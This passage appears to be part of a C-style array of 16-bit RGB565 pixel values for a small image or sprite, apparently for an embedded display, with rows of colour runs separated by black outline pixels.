0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
